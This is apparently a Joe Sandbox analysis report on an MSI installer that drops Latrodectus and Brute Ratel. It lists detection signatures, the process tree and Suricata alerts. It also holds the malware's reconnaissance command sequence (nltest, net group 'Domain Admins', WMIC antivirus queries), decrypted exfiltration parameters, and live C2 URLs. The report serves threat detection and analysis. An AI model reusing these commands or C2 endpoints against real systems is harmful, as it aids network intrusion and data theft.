Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lavita.msi

Overview

General Information

Sample name:lavita.msi
Analysis ID:1576900
MD5:b4d82d17669303be46edbf7b7c5823a2
SHA1:1d8e902129f1bfba8d349403b5d45a737d1372c3
SHA256:f071f083770fe89d0860ba0cf46eda960d3ccf31639a18dda8954a0c026165d9
Tags:msiuser-pr0xylife
Infos:

Detection

BruteRatel, Latrodectus
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected BruteRatel
Yara detected Latrodectus
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if browser processes are running
Contains functionality to inject threads in other processes
Contains functionality to steal Internet Explorer form passwords
Creates a thread in another existing process (thread injection)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Performs a network lookup / discovery via net view
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: RunDLL32 Spawning Explorer
Tries to harvest and steal browser information (history, passwords, etc)
Uses ipconfig to lookup or modify the Windows network settings
Uses net.exe to modify the status of services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the current domain controller via net
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • msiexec.exe (PID: 3604 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\lavita.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 6656 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 828 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 50018695A6192D85B7480687F9E151A9 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • rundll32.exe (PID: 7024 cmdline: C:/Windows/System32/rundll32.exe appgpuset.dll, GfeXcodeFunc MD5: EF3179D498793BF4234F708D3BE28633)
      • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmd.exe (PID: 2144 cmdline: /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • ipconfig.exe (PID: 2364 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • cmd.exe (PID: 3804 cmdline: /c systeminfo MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 884 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • systeminfo.exe (PID: 3660 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
            • WmiPrvSE.exe (PID: 1656 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • cmd.exe (PID: 4064 cmdline: /c nltest /domain_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • nltest.exe (PID: 2724 cmdline: nltest /domain_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
        • cmd.exe (PID: 3780 cmdline: /c nltest /domain_trusts /all_trusts MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • nltest.exe (PID: 5272 cmdline: nltest /domain_trusts /all_trusts MD5: 70E221CE763EA128DBA484B2E4903DE1)
        • cmd.exe (PID: 5280 cmdline: /c net view /all /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 6812 cmdline: net view /all /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • cmd.exe (PID: 5244 cmdline: /c net view /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 6736 cmdline: net view /all MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • cmd.exe (PID: 1020 cmdline: /c net group "Domain Admins" /domain MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 5012 cmdline: net group "Domain Admins" /domain MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 6256 cmdline: C:\Windows\system32\net1 group "Domain Admins" /domain MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 3260 cmdline: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 3756 cmdline: /c net config workstation MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • net.exe (PID: 7088 cmdline: net config workstation MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
            • net1.exe (PID: 5232 cmdline: C:\Windows\system32\net1 config workstation MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • cmd.exe (PID: 2788 cmdline: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 1488 cmdline: wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
          • findstr.exe (PID: 4552 cmdline: findstr /V /B /C:displayName MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Brute Ratel C4, BruteRatelBrute Ratel C4 (BRC4) is a commercial framework for red-teaming and adversarial attack simulation, which made its first appearance in December 2020. It was specifically designed to evade detection by endpoint detection and response (EDR) and antivirus (AV) capabilities. BRC4 allows operators to deploy a backdoor agent known as Badger (aka BOLDBADGER) within a target environment.This agent enables arbitrary command execution, facilitating lateral movement, privilege escalation, and the establishment of additional persistence avenues. The Badger backdoor agent can communicate with a remote server via DNS over HTTPS, HTTP, HTTPS, SMB, and TCP, using custom encrypted channels. It supports a variety of backdoor commands including shell command execution, file transfers, file execution, and credential harvesting. Additionally, the Badger agent can perform tasks such as port scanning, screenshot capturing, and keystroke logging. Notably, in September 2022, a cracked version of Brute Ratel C4 was leaked in the cybercriminal underground, leading to its use by threat actors.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4
NameDescriptionAttributionBlogpost URLsLink
Latrodectus, LatrodectusFirst discovered in October 2023, BLACKWIDOW is a backdoor written in C that communicates over HTTP using RC4 encrypted requests. The malware has the capability to execute discovery commands, query information about the victim's machine, update itself, as well as download and execute an EXE, DLL, or shellcode. The malware is believed to have been developed by LUNAR SPIDER, the creators of IcedID (aka BokBot) Malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.latrodectus

Malware Configuration

Threatname: Latrodectus

{"C2 url": ["https://proliforetka.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000003.2394515342.000001DA031BB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
    00000004.00000002.4600031642.000001DA0329C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
      00000004.00000002.4600031642.000001DA0330C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
        00000007.00000002.4606571879.000000000950A000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_LatrodectusYara detected LatrodectusJoe Security
          00000004.00000002.4597607083.000001DA0318C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BruteRatel_1Yara detected BruteRatelJoe Security
            Click to see the 4 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: RunDLL32 Spawning Explorer
            Source: Process startedAuthor: elhoim, CD_ROM_: Data: Command: C:\Windows\Explorer.EXE, CommandLine: C:\Windows\Explorer.EXE, CommandLine|base64offset|contains: , Image: C:\Windows\explorer.exe, NewProcessName: C:\Windows\explorer.exe, OriginalFileName: C:\Windows\explorer.exe, ParentCommandLine: C:/Windows/System32/rundll32.exe appgpuset.dll, GfeXcodeFunc, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7024, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\Explorer.EXE, ProcessId: 4004, ProcessName: explorer.exe
            Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net group "Domain Admins" /domain, CommandLine: net group "Domain Admins" /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net group "Domain Admins" /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1020, ParentProcessName: cmd.exe, ProcessCommandLine: net group "Domain Admins" /domain, ProcessId: 5012, ProcessName: net.exe
            Sigma detected: Net.exe Execution
            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5280, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 6812, ProcessName: net.exe
            Sigma detected: Share And Session Enumeration Using Net.EXE
            Source: Process startedAuthor: Endgame, JHasenbusch (ported for oscd.community): Data: Command: net view /all /domain, CommandLine: net view /all /domain, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: /c net view /all /domain, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5280, ParentProcessName: cmd.exe, ProcessCommandLine: net view /all /domain, ProcessId: 6812, ProcessName: net.exe
            Sigma detected: Suspicious Network Command
            Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: /c ipconfig /all, CommandLine: /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4004, ParentProcessName: explorer.exe, ProcessCommandLine: /c ipconfig /all, ProcessId: 2144, ProcessName: cmd.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T17:56:49.563810+010020283713Unknown Traffic192.168.2.649935172.67.161.60443TCP
            2024-12-17T17:56:52.748552+010020283713Unknown Traffic192.168.2.649942172.67.161.60443TCP
            2024-12-17T17:56:54.863333+010020283713Unknown Traffic192.168.2.649947172.67.161.60443TCP
            2024-12-17T17:56:58.125221+010020283713Unknown Traffic192.168.2.649959104.21.16.1443TCP
            2024-12-17T17:57:01.029378+010020283713Unknown Traffic192.168.2.649965104.21.16.1443TCP
            2024-12-17T17:57:06.421171+010020283713Unknown Traffic192.168.2.649978104.21.16.1443TCP
            2024-12-17T17:57:09.487377+010020283713Unknown Traffic192.168.2.649989104.21.16.1443TCP
            2024-12-17T17:57:14.689327+010020283713Unknown Traffic192.168.2.649998104.21.16.1443TCP
            2024-12-17T17:57:18.678271+010020283713Unknown Traffic192.168.2.649999104.21.16.1443TCP
            2024-12-17T17:57:21.823230+010020283713Unknown Traffic192.168.2.650000104.21.16.1443TCP
            2024-12-17T17:57:24.944663+010020283713Unknown Traffic192.168.2.650001104.21.16.1443TCP
            2024-12-17T17:57:27.848882+010020283713Unknown Traffic192.168.2.650002104.21.16.1443TCP
            2024-12-17T17:57:30.168446+010020283713Unknown Traffic192.168.2.650003104.21.16.1443TCP
            2024-12-17T17:57:31.564545+010020283713Unknown Traffic192.168.2.650004172.67.161.60443TCP
            2024-12-17T17:57:33.615918+010020283713Unknown Traffic192.168.2.650005172.67.161.60443TCP
            2024-12-17T17:57:35.715118+010020283713Unknown Traffic192.168.2.650006172.67.161.60443TCP
            2024-12-17T17:57:38.189963+010020283713Unknown Traffic192.168.2.650008172.67.161.60443TCP
            2024-12-17T17:57:40.750682+010020283713Unknown Traffic192.168.2.650009172.67.161.60443TCP
            2024-12-17T17:57:43.037531+010020283713Unknown Traffic192.168.2.650010172.67.161.60443TCP
            2024-12-17T17:57:46.529026+010020283713Unknown Traffic192.168.2.650012172.67.161.60443TCP
            2024-12-17T17:57:48.788880+010020283713Unknown Traffic192.168.2.650013172.67.161.60443TCP
            2024-12-17T17:57:51.457725+010020283713Unknown Traffic192.168.2.650014172.67.161.60443TCP
            2024-12-17T17:57:53.713246+010020283713Unknown Traffic192.168.2.650015172.67.161.60443TCP
            2024-12-17T17:57:55.760588+010020283713Unknown Traffic192.168.2.650016172.67.161.60443TCP
            2024-12-17T17:57:58.333764+010020283713Unknown Traffic192.168.2.650017172.67.161.60443TCP
            2024-12-17T17:58:00.526445+010020283713Unknown Traffic192.168.2.650018172.67.161.60443TCP
            2024-12-17T17:58:03.112439+010020283713Unknown Traffic192.168.2.650019172.67.161.60443TCP
            2024-12-17T17:58:05.374431+010020283713Unknown Traffic192.168.2.650020172.67.161.60443TCP
            2024-12-17T17:58:07.419939+010020283713Unknown Traffic192.168.2.650021172.67.161.60443TCP
            2024-12-17T17:58:09.748759+010020283713Unknown Traffic192.168.2.650022172.67.161.60443TCP
            2024-12-17T17:58:11.694573+010020283713Unknown Traffic192.168.2.650023172.67.161.60443TCP
            2024-12-17T17:58:13.796343+010020283713Unknown Traffic192.168.2.650024172.67.161.60443TCP
            2024-12-17T17:58:16.504488+010020283713Unknown Traffic192.168.2.650025172.67.161.60443TCP
            2024-12-17T17:58:18.688811+010020283713Unknown Traffic192.168.2.650026172.67.161.60443TCP
            2024-12-17T17:58:21.286507+010020283713Unknown Traffic192.168.2.650027172.67.161.60443TCP
            2024-12-17T17:58:23.377684+010020283713Unknown Traffic192.168.2.650029172.67.161.60443TCP
            2024-12-17T17:58:25.642402+010020283713Unknown Traffic192.168.2.650030172.67.161.60443TCP
            2024-12-17T17:58:27.665847+010020283713Unknown Traffic192.168.2.650031172.67.161.60443TCP
            2024-12-17T17:58:29.693396+010020283713Unknown Traffic192.168.2.650032172.67.161.60443TCP
            2024-12-17T17:58:31.746455+010020283713Unknown Traffic192.168.2.650034172.67.161.60443TCP
            2024-12-17T17:58:34.435386+010020283713Unknown Traffic192.168.2.650035172.67.161.60443TCP
            2024-12-17T17:58:36.496760+010020283713Unknown Traffic192.168.2.650036172.67.161.60443TCP
            2024-12-17T17:58:38.563226+010020283713Unknown Traffic192.168.2.650037172.67.161.60443TCP
            2024-12-17T17:58:40.641109+010020283713Unknown Traffic192.168.2.650038172.67.161.60443TCP
            2024-12-17T17:58:42.966548+010020283713Unknown Traffic192.168.2.650039172.67.161.60443TCP
            2024-12-17T17:58:45.886526+010020283713Unknown Traffic192.168.2.650040172.67.161.60443TCP
            2024-12-17T17:58:48.572493+010020283713Unknown Traffic192.168.2.650041172.67.161.60443TCP
            2024-12-17T17:58:50.776772+010020283713Unknown Traffic192.168.2.650042172.67.161.60443TCP
            2024-12-17T17:58:52.798751+010020283713Unknown Traffic192.168.2.650043172.67.161.60443TCP
            2024-12-17T17:58:55.123717+010020283713Unknown Traffic192.168.2.650044172.67.161.60443TCP
            2024-12-17T17:58:57.231538+010020283713Unknown Traffic192.168.2.650045172.67.161.60443TCP
            2024-12-17T17:58:59.753330+010020283713Unknown Traffic192.168.2.650046172.67.161.60443TCP
            2024-12-17T17:59:02.563072+010020283713Unknown Traffic192.168.2.650047172.67.161.60443TCP
            2024-12-17T17:59:04.593816+010020283713Unknown Traffic192.168.2.650048172.67.161.60443TCP
            2024-12-17T17:59:06.965173+010020283713Unknown Traffic192.168.2.650049172.67.161.60443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T17:56:49.586025+010020487351A Network Trojan was detected192.168.2.649935172.67.161.60443TCP
            2024-12-17T17:56:53.404984+010020487351A Network Trojan was detected192.168.2.649942172.67.161.60443TCP
            2024-12-17T17:56:55.607786+010020487351A Network Trojan was detected192.168.2.649947172.67.161.60443TCP
            2024-12-17T17:56:59.789799+010020487351A Network Trojan was detected192.168.2.649959104.21.16.1443TCP
            2024-12-17T17:57:17.376024+010020487351A Network Trojan was detected192.168.2.649998104.21.16.1443TCP
            2024-12-17T17:57:18.679141+010020487351A Network Trojan was detected192.168.2.649999104.21.16.1443TCP
            2024-12-17T17:57:23.487490+010020487351A Network Trojan was detected192.168.2.650000104.21.16.1443TCP
            2024-12-17T17:57:26.587367+010020487351A Network Trojan was detected192.168.2.650001104.21.16.1443TCP
            2024-12-17T17:57:27.849863+010020487351A Network Trojan was detected192.168.2.650002104.21.16.1443TCP
            2024-12-17T17:57:32.257828+010020487351A Network Trojan was detected192.168.2.650004172.67.161.60443TCP
            2024-12-17T17:57:34.418190+010020487351A Network Trojan was detected192.168.2.650005172.67.161.60443TCP
            2024-12-17T17:57:36.473410+010020487351A Network Trojan was detected192.168.2.650006172.67.161.60443TCP
            2024-12-17T17:57:38.939717+010020487351A Network Trojan was detected192.168.2.650008172.67.161.60443TCP
            2024-12-17T17:57:41.552541+010020487351A Network Trojan was detected192.168.2.650009172.67.161.60443TCP
            2024-12-17T17:57:44.733327+010020487351A Network Trojan was detected192.168.2.650010172.67.161.60443TCP
            2024-12-17T17:57:47.274049+010020487351A Network Trojan was detected192.168.2.650012172.67.161.60443TCP
            2024-12-17T17:57:49.488222+010020487351A Network Trojan was detected192.168.2.650013172.67.161.60443TCP
            2024-12-17T17:57:52.277311+010020487351A Network Trojan was detected192.168.2.650014172.67.161.60443TCP
            2024-12-17T17:57:54.445432+010020487351A Network Trojan was detected192.168.2.650015172.67.161.60443TCP
            2024-12-17T17:57:56.537150+010020487351A Network Trojan was detected192.168.2.650016172.67.161.60443TCP
            2024-12-17T17:57:59.064652+010020487351A Network Trojan was detected192.168.2.650017172.67.161.60443TCP
            2024-12-17T17:58:01.296382+010020487351A Network Trojan was detected192.168.2.650018172.67.161.60443TCP
            2024-12-17T17:58:03.821780+010020487351A Network Trojan was detected192.168.2.650019172.67.161.60443TCP
            2024-12-17T17:58:06.036318+010020487351A Network Trojan was detected192.168.2.650020172.67.161.60443TCP
            2024-12-17T17:58:08.283056+010020487351A Network Trojan was detected192.168.2.650021172.67.161.60443TCP
            2024-12-17T17:58:10.413734+010020487351A Network Trojan was detected192.168.2.650022172.67.161.60443TCP
            2024-12-17T17:58:12.443428+010020487351A Network Trojan was detected192.168.2.650023172.67.161.60443TCP
            2024-12-17T17:58:14.579130+010020487351A Network Trojan was detected192.168.2.650024172.67.161.60443TCP
            2024-12-17T17:58:17.220446+010020487351A Network Trojan was detected192.168.2.650025172.67.161.60443TCP
            2024-12-17T17:58:19.382849+010020487351A Network Trojan was detected192.168.2.650026172.67.161.60443TCP
            2024-12-17T17:58:21.970889+010020487351A Network Trojan was detected192.168.2.650027172.67.161.60443TCP
            2024-12-17T17:58:24.133335+010020487351A Network Trojan was detected192.168.2.650029172.67.161.60443TCP
            2024-12-17T17:58:26.344275+010020487351A Network Trojan was detected192.168.2.650030172.67.161.60443TCP
            2024-12-17T17:58:28.356736+010020487351A Network Trojan was detected192.168.2.650031172.67.161.60443TCP
            2024-12-17T17:58:30.443624+010020487351A Network Trojan was detected192.168.2.650032172.67.161.60443TCP
            2024-12-17T17:58:32.468728+010020487351A Network Trojan was detected192.168.2.650034172.67.161.60443TCP
            2024-12-17T17:58:35.186199+010020487351A Network Trojan was detected192.168.2.650035172.67.161.60443TCP
            2024-12-17T17:58:37.284676+010020487351A Network Trojan was detected192.168.2.650036172.67.161.60443TCP
            2024-12-17T17:58:39.351281+010020487351A Network Trojan was detected192.168.2.650037172.67.161.60443TCP
            2024-12-17T17:58:41.426648+010020487351A Network Trojan was detected192.168.2.650038172.67.161.60443TCP
            2024-12-17T17:58:43.757585+010020487351A Network Trojan was detected192.168.2.650039172.67.161.60443TCP
            2024-12-17T17:58:46.801867+010020487351A Network Trojan was detected192.168.2.650040172.67.161.60443TCP
            2024-12-17T17:58:49.314545+010020487351A Network Trojan was detected192.168.2.650041172.67.161.60443TCP
            2024-12-17T17:58:51.486827+010020487351A Network Trojan was detected192.168.2.650042172.67.161.60443TCP
            2024-12-17T17:58:53.536464+010020487351A Network Trojan was detected192.168.2.650043172.67.161.60443TCP
            2024-12-17T17:58:55.905573+010020487351A Network Trojan was detected192.168.2.650044172.67.161.60443TCP
            2024-12-17T17:58:57.984853+010020487351A Network Trojan was detected192.168.2.650045172.67.161.60443TCP
            2024-12-17T17:59:00.732167+010020487351A Network Trojan was detected192.168.2.650046172.67.161.60443TCP
            2024-12-17T17:59:03.243465+010020487351A Network Trojan was detected192.168.2.650047172.67.161.60443TCP
            2024-12-17T17:59:05.286158+010020487351A Network Trojan was detected192.168.2.650048172.67.161.60443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T17:57:05.181169+010020180521A Network Trojan was detected192.168.2.649965104.21.16.1443TCP
            2024-12-17T17:57:08.261240+010020180521A Network Trojan was detected192.168.2.649978104.21.16.1443TCP
            2024-12-17T17:57:11.365156+010020180521A Network Trojan was detected192.168.2.649989104.21.16.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-17T17:57:05.181169+010028032742Potentially Bad Traffic192.168.2.649965104.21.16.1443TCP
            2024-12-17T17:57:11.365156+010028032742Potentially Bad Traffic192.168.2.649989104.21.16.1443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://dogirafer.com/test/8713781_55685573550420_1137939URLS1https://proliforetka.com/test/4803877_Avira URL Cloud: Label: malware
            Source: https://dogirafer.com/test/876227_481825193277_5070988URLS1https://proliforetka.com/test/6581893_513Avira URL Cloud: Label: malware
            Source: https://dogirafer.com/test/Avira URL Cloud: Label: malware
            Source: https://dogirafer.com/test/stkm.binDS&sAvira URL Cloud: Label: malware
            Source: https://dogirafer.com/test/8085467_13561511323361_4058196URLS1https://proliforetka.com/test/775166_4Avira URL Cloud: Label: malware
            Source: https://dogirafer.com/test/t/Avira URL Cloud: Label: malware
            Found malware configuration
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackMalware Configuration Extractor: Latrodectus {"C2 url": ["https://proliforetka.com/test/", "https://dogirafer.com/test/"], "Group Name": "Lambda", "Campaign ID": 3306744842}
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
            Sample uses string decryption to hide its real strings
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /c ipconfig /all
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /c systeminfo
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /c nltest /domain_trusts
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /c net view /all
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /c nltest /domain_trusts /all_trusts
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /c net view /all /domain
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &ipconfig=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /c net group "Domain Admins" /domain
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\Windows\System32\wbem\wmic.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /c net config workstation
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: /c whoami /groups
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: C:\Windows\System32\cmd.exe
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &systeminfo=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &domain_trusts=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &domain_trusts_all=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &net_view_all_domain=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &net_view_all=
            Source: 7.0.explorer.exe.2f20000.0.raw.unpackString decryptor: &net_group=
